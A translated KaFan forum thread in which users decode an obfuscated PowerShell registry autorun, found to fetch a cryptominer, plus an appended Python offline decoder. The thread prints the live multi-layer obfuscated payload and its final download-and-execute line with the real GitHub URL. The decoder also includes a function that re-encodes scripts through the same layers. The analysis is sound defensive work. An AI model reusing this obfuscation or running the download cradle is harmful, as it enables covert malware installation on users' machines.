Views: 2103 | Replies: 6

[System] System CPU at 99%, a cmd command is running

yj2371
Posted on 2018-4-22 15:47:10

  1. cmd.ExE/cc:\winDowS\sYsWOw64\wInDOWSpoWershELl\v1.0\pOwERSHeLl.exE ".((gV '*mdR*').nAME[3,11,2]-JoiN'') ("$(SET-vaRiAble 'OFs' '' )" + [stRiNG]('20h26y20h28-20l24z70n73z48q4fl4dh65z5bl34z5dy2bh24n70l73q68-6fy6d-65y5bq33h30-5dy2by27l58u27q29l20n28h20q5bl53u54-72-69-6eh47z5dl3al3ay6au4f-69n4ey28z27h27l20-2cy20z28l20u28u34h30y20u2cu20y33u32h20n2cy31z31n30n20u2cz31l30n31y2cl20z38l37y2cz34l35-2ch20h37l39n20u2cz36z36q20y2cy20q31h30l36l2cl20h36y39-20u2cu20z36h37y20q2cz20n38y34y2ch33z32-2ch20z33n32n20z2cl20y37-33z2cn37y39h2cu20y34y36-2c-20q36l37n20n2cl20q31h31h31-20-2cn20-31u30-39h2c-20l38z30h20l2cl38l32q2cy20n31q30-31l2c-38q33h2cl38z33h20u2cz37z33-20l2cz20q37-39l20l2cu37h38q2cz34q36-2cu31l30y30n2cy36-39n20z2ch20l31u30q32z20-2cl31h30h38l20h2cu20q36z35n2c-38q34n20q2cq31-30y31-20h2cn31z31l35h2c-20q38y34y20z2cu20q31n31h34h2cq36y39y2cq36u35q20u2cl37-37z2c-34y30y2ch20l33l32q20l2c-20l39n31y2cq20n31y31l35q2cn20l38-39q2cl20h38y33h20q2cq38n34h20l2ch20y31y30l31q2cz31z30z39u2cz34y36l2c-31u30z35l2cy31u31u31z20l2cl34h36u2cl20l37l37l20h2cq36-39y20y2cy20l31u30q39n2cl37y39-2ch20h31y31z34h2cq38y39l2ch20n38z33y20l2cy20q31y31n36h20u2cy31h31n34n2cz20u36h39y2cz20y36h35h2cl37l37u20h2cq20u39l33h2cl39y31y2cu20z39u39q20u2cu20h31y31l31h2cn20n31l31h30-20l2cq38q36y20z2cn20u31h30l31q2cu20u38h32q20n2cy38y34l2cq39-33z2cq20q35h38l2cq35h38l20y2cn20-37n30z20u2c-20q31q31h34u2cz37z39y20l2c-20y37l37h20u2cu36n36y20q2cu20y39n37q20-2cy31-31-35u20u2ch31n30n31l20n2cq35y34q20z2cq20z35-32l20u2ch20-38q33h20l2cq20q38y34q20y2cq31q31u34y20l2ch31z30-35-2cl31z31y30u2cy20z37-31q20h2cu20q34h30h20q2cu20h33h39u2cy35z35n2cq20-39z38z2c-34h38n20z2cz37l32z20z2cl38q39z2c-20z36-36l2cq31h32n30y2cu20-37n34u2cl31z30q38n2cu31z30n35z20y2cu38z35y20q2ch31h30l39q2cn37l36u20h2cz20u35z30n20q2cu20l35u31y2cz37u35-20z2cy20z31h30u31h2cq35-31z2cz20z35q37y20z2ch37z35n20n2cz35-37q20l2cn20q38h35-20q2cn31y31u34q20l2cq38u38z2cn20u35q32h20l2c-20l37q32u2cy20y38q33u2c-20-31-30z34y2cn20-36q37z2cu37y33y2cl20n36y36-2cu20z31z30h33h20u2cl36z39z2cn31-32u31
z20l2ch38n34z20-2cn38y39y2cz20n31z30-37u20q2cq36h39n2cq36u35u20n2cz38q31q20-2cz35q35h2c-37n37z2c-37-31u2cq20n37l33u2cu20y31y32q32y20h2ch20n31l30q31u2cy20u39z37u20h2cu38h33l2c-35l35h2cu20n36n36h2ch34-39-20-2cy20n31h31n32-20-2cu20y38h32q20-2ch20h31-32-31q20h2cn20l37n37h2ch31n31n32q2cq31y31h33y2cn20q31-32y31z20z2cy20y31l31q33n20y2cn36q36h20-2cu31l32h31z20-2ch31l30h39n2cl20-38-36n20-2cy20n38z37l2cy20z39-30y20u2cu20z38z36n20y2ch34q39q20n2cl31z30q39-2ch37u30y2cq20u31-30q37h2ch20y36l38u2cy37q37q2c-20u35z35u20h2cl20-39h30l2cq35q30-20z2cl35z36l20u2cy20l35z37y20q2cq20h35-37u2cz35h33u20y2cu20z35z35y20q2cq35q35n20z2c-20u35h35-2cl35q31u20z2cy20q35u31z20u2ch35h31n20-2cl20q31h31y30u20z2c-31h31n38q20-2cq31l31y38n2ch31y31n38q2cy20-31l30q32u20y2cu20h31h30z31h2cl35h34h20q2cq37z39h2cn20q35h33z2cz20l34q39u20h2cy37z39n20y2cu20-37y34h20n2cl20y34h37h2cn20z31u30y32q20q2cl20l31l30l32q2cu34u37z2c-31q32n32-2cq35n37n20z2cy20y39h39-20h2cl20-39z30u2cq31y30q39y20y2cn38u31l2ch36y36n20-2cl39n38u20n2cy38y30n2c-39q38u20-2cz20u37q39y2cl38l33n2cn31y31h36u2c-31-31q34u20y2c-37h34q20-2cn20y31z31-30-20u2cl20-31h30n35-2cn37-31n20n2cq20-36u35q2ch31l31z33y2cu31q31h35q2cq20y31z30z33q20-2cz31q30u32n20u2ch38z30l20h2cq20-35u31h20q2c-35l33y20n2cq20l35-36q2cz37y32n20-2cq20-31z32u32h20z2cu35u36y2cn31-30z35-2cq20n31-32q32q2cl20z31h30h37z2cn20h35y33y2cq20z34z37h20q2cn20q35h35y2cz20l35u34z2cn20q34-38-2cu20u38y38y20l2cn34y33n2cl20h31y30u30-2c-38n38-20l2c-20q35q30-20y2cz20q31u30-38l20u2cz35z33z20q2cn37l39-20-2cq20n31q30y32u20h2cq31q32z32h20y2cy20n31n31n33q20h2cq31u30n30l20n2cl20q31q31u36n2cy20y34-33l20l2cy20n31-30u35l2c-20n37h34u2cu31y31y38h2cl31-32-30y2cq20q35q37q20u2cy34n37-20-2cn20l37u38q20l2cn20h37n34q2c-31z32h31h20h2cz20y31q30n30h2cq20n31y30n38q2c-20z31l30n37z20y2cl20u38n33y20q2cu34n37y20y2cq20-39h38y20z2cz20-37n39-2cn34l33n20q2cq20y37q39-20y2cu20z31-31q30h2cn34u39y2cn31u30l30y20l2cn20h38-37-2cl31z32-31-2cz31q31n34h2cl20q37h36z20z2cu20u37h36y20u2c-20-39h30h2cq35l34z2c-35y35n2cy38-39y2c-31-31n37h2cz31n30y38-2ch31h30u3
4z20u2cz31u30z30h20l2cu20l39q38-20-2cq20u37z32-2cq20n35z36q2cn34l37l20q2cl39n38q20y2cn31q30n30u20-2cn20z31l31z36l20-2ch20l38l35-2cn35z36l20q2cu31z31z37z20u2c-31h31n30q20l2cl31h31z37l20n2cq20q35q31h2cu31l32-32-2cy20z31q31h33y20y2c-35h35-20l2cn37-31l2cz20-37q30y20u2cl34n38y2cq20u38z35-2cq35-35-2cn20u38l38n2cu20y34l38z2cz20u34-37h20y2cl38y37n20l2cz38q34z20q2cn38n36y20y2cq20h35q33q20h2cu38n30l2cl31z31u33l20q2cu35z30h20q2cz38u36z20-2cu20l37q36y2cn31h32q32l20y2cn20l39l39y2cz20h31y30l32h20u2cn38-34z2cn20q39h37l20q2cy31n31u30z2cz20-37q31y2cn20u35-31n20y2c-31-31q37h20-2cy20u37h34y2cu35q33h20-2cu20y39l39z20-2ch20h38z34z2c-31y30z31h20h2cy20n34n33h20n2cu35h30z2cl31-31y33u20z2c-20y34y37u20-2cn31y32h30y20l2ch31n30n30h20n2ch31y31-38z2cq31q30h39l2cq20n31z32-31l2c-31n31q37h20u2ch35h35u2c-31n32y31l2cn20u35u34z20h2cl20q31-32n31n20-2cn20z31y31-32q20z2c-31z31u35h2cu20l35q31n2cz20z31h31y34q2c-31l31q37n20u2ch20y31q31n39z2c-20l34y33u20u2ch38u37z20h2cy20n31z32-32-2cn38y31u20n2cn34h33u20n2ch20q37-35-20-2cq20q34q39l20z2cy20n38l38h2cq31y30l36h20-2c-20-38l36u2cu35h35u20h2ch37z32h20u2cl20q35u33h20n2cu35q36l20h2cy35l33n2c-34n37y20-2cy20n35q36n2cq20l36-36n2ch33-39-2ch20z33q32u20-2cz34u31y2cy33q32h20-2ch20n34-34z2cn33l32n20n2cy39z31-2c-37z33l2cq37z39h20q2cz20u34y36n20u2c-36q37n2cn20u31l31-31y20h2cn31z30l39z2cn31u31u32y2cn31z31u34h2c-36l39u2ch31l31-35n2ch31y31z35q20u2cq31-30n35l2cy37h39-2cq20u31u31l30z20h2cq34l36-2cq36y37l20-2ch20z31l31h31u20-2cq20z31u30q39h2cl20y38l30q2c-31z31l34h2cu31y30l31l20n2cu20l38z33u2cu20z38q33-2c-31u30h35z2ch20u37-39h20n2cn37l38q20n2cy37q37h2cy37q39q2c-31q30l30q20l2cq36y39h2cz39h33-20z2cu35h38z20n2c-35q38l2cn20h31y30n30-20q2cq31z30z31l20h2cu20-39q39l2cl31q31h31h20n2cz20l37l37l2cy20-31h31h32l2cu31l31q34q20l2cl31y30h31z20u2cl38y33q20u2cl31q31q35y20l2cq33q32y20u2cz20y34n31l20h2cl33q32z2cz20n31z32q34-2cu20q33l32u20u2cn20y33n37l2cn31n32z33u20l2cq31q31l30y20y2ch31q30q31l20u2cn38z37y20y2cl34z35u20q2cy37-39y2c-20n36n36l2cl31q30q36h20n2cz20z36n39u2cn36y37-20q2cn20n38n34u2ch20l33q32u
20l2cl33z32h20u2c-20-31n30l35-2cu20n37l39y2cl34q36y2cu20n38n33l20h2ch20l31z31u36u20n2cy20q38h32-20l2cl20h36q39z20-2cy36l35h20q2c-37z37h20h2cu20u38l32h2cz36z39n20h2cy20q36-35u2cn20n31y30l30l20n2c-20-36q39u20l2cz20l38h32n2cl34n30q20y2cl33u36-2cq20y39l35z20q2cq20z34-34y2cu33n32z20-2cl39n31n2cz31h31n35n2cn38y39-20z2cq31n31z35z20l2cz20-31z31l36y20u2cq31h30-31n2cz20q37l37n20z2cz20z34z36h2cl38u34q2cq20h31u30l31l2cu20q38q38q2ch20u31h31h36-20y2cu34n36l20n2cy20y36q39-2ch31q31l30n2cy36n37-20y2cu31z31q31z20y2cz31-30-30l20h2cu31-30z35h20l2cy31h31u30-20y2cq37-31-2cn39z33q2cu20q35y38q2c-35l38-20n2ch36-35z2cu20n31-31q35q2c-36z37-2cq37l33l2cq20y31-30l35u2cu20h33h32q2ch20n34u31q20n2cq33u32n20n2cz31n32u35y20h2cn20y33-32z20l2cl31y32y34u20l2cz33h37n2cu33l32y20q2c-20l31-32n33h2cq20l33u32q20u2cq33u36n2cl39l35-20h2cy34u36y20u2cn38h32-2cz20h36y39z2cl20l36q35h2cy36y38-2cl31u31h36q20n2cz37z39-20-2cz36-39h2cl20y37z38h2cu20q31z30y30l20z2cz20n34h30l20l2c-20l34n31y2c-33q32y20z2cl20z31q32u35z20y2cn20u34u31n20h2cu33y32y20h2ch31l32y34-2cu33z32h20n2cl20y31n30q35y20y2cy20z31-30q31h20l2c-31q32n30-29l7cn20y66y6fh52y45h61u43y68y2dz6fz42z6ah65-63q74q7by20-28z20y5bz49l6en54y5dq24n5fu2dq41z53-20n5bu43n48-61n72n5du29-7dh20n29z20-29n20u29'.split( 'hqzyln-u' ) |fOreAcH-oBJEcT { ([char]( [CoNvERT]::toINT16(([STring]$_),16) )) } )+"$(SeT-iTeM 'varIAblE:ofs' ' ') " )"
I saw an entry in the registry that runs this, and I have no idea what it means. Does any expert here know?

yj2371 (original poster)
Posted on 2018-4-22 18:16:32
( new-object  io.compression.deflatestream( [system.io.memorystream][convert]::frombase64string('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8izk5/760X+dX2l5Ofzqdt+iJvx9/NJydlkS/bO+On1dWyrLLZ67YulhdbH8/bdtU8unu3zq7GF0U7X0/WTV5Pq2VLzcfTanG3uJ5cTe+2q/xdvmyu7y6yps3ruw+WzQ+K1XjV7H585/8B' ) , [io.compression.compressionmode]::decompress ) | %{new-object  io.streamreader($_, [system.text.encoding]::ascii ) } |% { $_.readtoend() }) | iex
imba-tjd
Posted on 2018-5-8 09:28:31
Last edited by im-t on 2018-5-8 10:37

Apart from the first few letters, none of it has anything to do with cmd. I can't read it either, though.
Try a scan with 360 Emergency Kit (360急救箱).

I gave it a try: after decoding it 3 times it downloads https://raw.githubusercontent.co ... y/master/7nszip.ps1. I downloaded that by hand, and both Avira (红伞) and 360 Zip flag it as malicious.

yj2371 (original poster)
Posted on 2018-5-30 17:10:07
Quoting im-t (2018-5-8 09:28):
> Apart from the first few letters, none of it has anything to do with cmd. I can't read it either, though.
> Try a scan with 360 Emergency Kit (360急救箱).

Found it. It is a cryptomining program.
imba-tjd
Posted on 2018-5-30 22:31:57
Quoting yj2371 (2018-5-30 17:10):
> Found it. It is a cryptomining program.

By the way, how did you get the code in post #2 out of it?
随便注册
Posted on 2018-5-30 23:26:11
Quoting im-t (2018-5-30 22:31):
> By the way, how did you get the code in post #2 out of it?

Look at the split( 'hqzyln-u' ): delete all 8 of those characters and what is left is ASCII in hexadecimal. Convert it, and this time you get decimal; convert once more and it comes out.
How did you decode it 3 times?
  1. & ( $psHOMe[4]+$pshome[30]+'X') ( [STrinG]::jOiN('' , ( (40 , 32 ,110 ,101, 87,45, 79 ,66 , 106, 69 , 67 , 84,32, 32 , 73,79, 46, 67 , 111 , 109, 80 ,82, 101,83,83 ,73 , 79 ,78,46,100,69 , 102 ,108 , 65,84 ,101 ,115, 84 , 114,69,65 ,77,40, 32 , 91, 115, 89, 83 ,84 , 101,109,46,105,111 ,46, 77 ,69 , 109,79, 114,89, 83 , 116 ,114, 69, 65,77 , 93,91, 99 , 111, 110 ,86 , 101, 82 ,84,93, 58,58 , 70 , 114,79 , 77 ,66 , 97 ,115 ,101 ,54 , 52 , 83 , 84 ,114 ,105,110, 71 , 40 , 39,55, 98,48 ,72 ,89, 66,120, 74,108,105 ,85 ,109,76 , 50 , 51,75 , 101,51, 57 ,75 ,57 , 85 ,114 ,88, 52 , 72, 83, 104, 67,73, 66, 103 ,69,121 ,84 ,89, 107 ,69,65 ,81 ,55,77,71, 73, 122 , 101, 97 ,83,55, 66,49 , 112 , 82 , 121 , 77,112,113, 121 , 113 ,66 ,121 ,109, 86 , 87, 90 , 86 ,49 ,109,70, 107, 68,77, 55 , 90,50 ,56 , 57 , 57,53 , 55 ,55 , 55,51 , 51 ,51 , 110 ,118 ,118,118, 102 , 101,54 ,79, 53, 49 ,79 , 74 , 47, 102 , 102,47,122,57 , 99 , 90,109 ,81,66 ,98 ,80,98 , 79,83,116,114 ,74 , 110 , 105,71 , 65,113,115, 103 ,102 ,80 , 51 ,53 , 56,72 , 122 ,56,105, 122, 107, 53, 47 , 55, 54, 48, 88 ,43, 100,88 , 50 , 108 ,53 ,79 , 102 ,122 , 113 ,100 , 116, 43 , 105, 74,118,120, 57 ,47 , 78 , 74,121 , 100, 108, 107 , 83 ,47 , 98 , 79,43 , 79 , 110,49,100 , 87,121,114, 76 , 76 , 90,54,55,89,117,108,104 ,100 , 98 , 72, 56,47 ,98 ,100 , 116 , 85,56 ,117 ,110 ,117 , 51,122, 113 ,55 ,71, 70 ,48, 85,55, 88, 48, 47 ,87 ,84 ,86 , 53 ,80,113 ,50 ,86 , 76,122 , 99, 102 ,84, 97 ,110, 71, 51 ,117 , 74,53 , 99 , 84,101 , 43 ,50,113 , 47 ,120 ,100 ,118,109, 121,117 ,55,121, 54 , 121 , 112 ,115, 51, 114,117 , 119, 43 ,87 , 122,81 ,43 , 75 , 49 , 88,106 , 86,55 ,72 , 53 ,56 ,53,47 , 56, 66,39, 32 ,41,32 , 44,32 ,91,73,79 , 46 ,67, 111 ,109,112,114,69,115,115 ,105,79, 110 ,46,67 , 111 , 109, 80,114,101 , 83, 83,105, 79 ,78 ,77,79,100 ,69,93 ,58 ,58, 100 ,101 , 99,111 , 77, 112,114 ,101 ,83 ,115 ,32 , 41 ,32, 124, 32 , 37,123 ,110 ,101 ,87 ,45 ,79, 66,106 , 69,67 , 84, 32 ,32 , 105, 79,46, 83 , 116 , 82 , 69 ,65 ,77 
, 82,69 , 65, 100 , 69 , 82,40 ,36, 95 , 44,32 ,91,115,89 ,115 , 116 ,101, 77 , 46,84, 101, 88, 116 ,46 , 69,110,67 ,111 ,100 ,105 ,110 ,71,93, 58,58 ,65, 115,67,73, 105, 32, 41 ,32 ,125 , 32 ,124 ,37,32 , 123, 32 ,36,95 ,46 ,82, 69, 65,68,116 ,79 ,69, 78, 100 , 40 , 41,32 , 125 , 41 ,32 ,124,32 , 105 , 101 ,120)| foREaCh-oBject{ ( [InT]$_-AS [CHar])} ) ) )
imba-tjd
Posted on 2018-6-2 22:23:43
Quoting 随便注册 (2018-5-30 23:26):
> Look at the split( 'hqzyln-u' ): delete all 8 of those characters and what is left is ASCII in hexadecimal. Convert it, and this time you get decimal; convert once more and it comes out ...

Getting as far as the code in post #2 is what I count as two rounds of decoding.
Then I kept following its code:
first use Convert.FromBase64String to get a byte array,
then use System.IO.Compression's new DeflateStream(new System.IO.MemoryStream(byteArray), CompressionMode.Decompress),
Read that into a byte array and pass it to the static method System.Text.Encoding.ASCII.GetString.
What you get is:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/iybwc/tpexensy/master/7nszip.ps1')
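The two replies above give the procedure by hand: strip the 8 split() characters and read the rest as hex, turn the resulting list of decimal codes into characters, then base64-decode and inflate to reach the final download line. The script below is an added example (not code from any of the posts) that does the same three steps offline in Python and never passes anything to iex or Invoke-Expression, so the payload is only read and its URL pulled out as an indicator. All function names are mine. Because the real first-stage blob from post #1 is far too long to repeat, build_sample() re-encodes a harmless one-liner with a placeholder URL (https://example.invalid/demo.ps1, constructed for the demo) through the same three layers; main() additionally inflates the actual base64 from post #2 so the result can be compared with the last reply. Note that neither outer stage ever writes the word iex: post #1 assembles it from (gV '*mdR*').Name[3,11,2], i.e. the letters of MaximumDriveCount, and the decimal stage from $PSHOME[4]+$PSHOME[30]+'X', so a static decode simply never reproduces that invocation.

```python
"""Offline decoder for the three obfuscation layers discussed in this thread.

Added example, not code from any post. It redoes the decode steps the replies
describe and never passes anything to iex / Invoke-Expression, so the script is
only read as data. Layers, outermost first:
  1. hex byte values separated by the junk characters 'hqzyln-u'  (post #1)
  2. a comma-separated list of decimal character codes             (随便注册's reply)
  3. base64 of a raw DEFLATE stream that inflates to the final line (post #2)
"""
import base64
import re
import zlib

SEPARATOR_CHARS = "hqzyln-u"  # exact argument of .split() in the first stage


def decode_hex_layer(text: str, separators: str = SEPARATOR_CHARS) -> str:
    """Layer 1: drop the separator characters and read each piece as a hex byte.

    Mirrors  '...'.split('hqzyln-u') | % { [char][Convert]::ToInt16($_, 16) }.
    Accepts the bare blob or the whole cmd line (the quoted blob in front of
    .split( is picked out). Empty pieces are skipped rather than treated as 0.
    """
    m = re.search(r"'([0-9a-fA-F" + re.escape(separators) + r"]+)'\s*\.split\(", text)
    blob = m.group(1) if m else text
    pieces = re.split("[" + re.escape(separators) + "]+", blob)
    return "".join(chr(int(p, 16)) for p in pieces if p)


def decode_decimal_layer(script: str) -> str:
    """Layer 2: longest comma-separated run of integers -> characters.

    Mirrors  (40, 32, 110, ...) | % { [int]$_ -as [char] }.  The $PSHOME[4] and
    $PSHOME[30] indexing around it (which spells 'ieX') is deliberately ignored.
    """
    runs = re.findall(r"\d+(?:\s*,\s*\d+)+", script)
    if not runs:
        raise ValueError("no decimal character list found")
    return "".join(chr(int(n)) for n in re.findall(r"\d+", max(runs, key=len)))


def decode_deflate_layer(script: str) -> str:
    """Layer 3: FromBase64String('...') -> raw DEFLATE -> ASCII text.

    .NET DeflateStream writes a raw RFC 1951 stream with no zlib header; that is
    what wbits=-15 tells zlib to expect.
    """
    m = re.search(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'", script, re.IGNORECASE)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("ascii")


def decode_all(stage1: str) -> list:
    """Peel all three layers; returns [stage1, stage2, stage3, final_script]."""
    stages = [stage1]
    for step in (decode_hex_layer, decode_decimal_layer, decode_deflate_layer):
        stages.append(step(stages[-1]))
    return stages


def extract_urls(script: str) -> list:
    """Pull http(s) URLs out of a decoded stage as indicators, without running it."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def build_sample(final_script: str) -> str:
    """Re-encode a harmless script through the same three layers (constructed
    test data; the real first-stage blob in post #1 is too long to repeat)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, as .NET emits
    b64 = base64.b64encode(comp.compress(final_script.encode("ascii")) + comp.flush()).decode()
    stage3 = ("(new-object io.compression.deflatestream([system.io.memorystream]"
              "[convert]::frombase64string('" + b64 + "'), [io.compression."
              "compressionmode]::decompress) | %{new-object io.streamreader($_, "
              "[system.text.encoding]::ascii)} | %{$_.readtoend()}) | iex")
    codes = ", ".join(str(ord(c)) for c in stage3)
    stage2 = ("& ($psHOMe[4]+$pshome[30]+'X') ([STrinG]::jOiN('', ((" + codes +
              ") | foREaCh-oBject { ([InT]$_ -AS [CHar]) })))")
    return "".join(format(ord(c), "02x") + SEPARATOR_CHARS[i % len(SEPARATOR_CHARS)]
                   for i, c in enumerate(stage2))


if __name__ == "__main__":
    demo = build_sample("IEX(New-Object Net.WebClient).DownloadString("
                        "'https://example.invalid/demo.ps1')")  # placeholder URL
    for i, s in enumerate(decode_all(demo), 1):
        print("stage %d: %s" % (i, s[:72] + ("..." if len(s) > 72 else "")))
    print("IOCs:", extract_urls(decode_all(demo)[-1]))
    # The real stage-2 base64 exactly as it appears in post #2 above, inflated
    # the same way; nothing here is executed.
    page_stage2 = ("frombase64string('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyq"
                   "BymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8izk5/760X"
                   "+dX2l5Ofzqdt+iJvx9/NJydlkS/bO+On1dWyrLLZ67YulhdbH8/bdtU8unu3zq7GF0U7X0/WTV5Pq2VL"
                   "zcfTanG3uJ5cTe+2q/xdvmyu7y6yps3ruw+WzQ+K1XjV7H585/8B')")
    print("post #2 inflates to:", decode_deflate_layer(page_stage2))
```

For the real sample, paste the whole cmd line from post #1 into decode_all(); decode_hex_layer() picks the quoted blob out of it. If a stage fails to parse, stop there and read the stage by eye rather than falling back to letting PowerShell evaluate it, since the whole point of the static route is that the last line is never run.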


卡饭论坛 (KaFan forum) | Copyright © KaFan  KaFan.cn All Rights Reserved.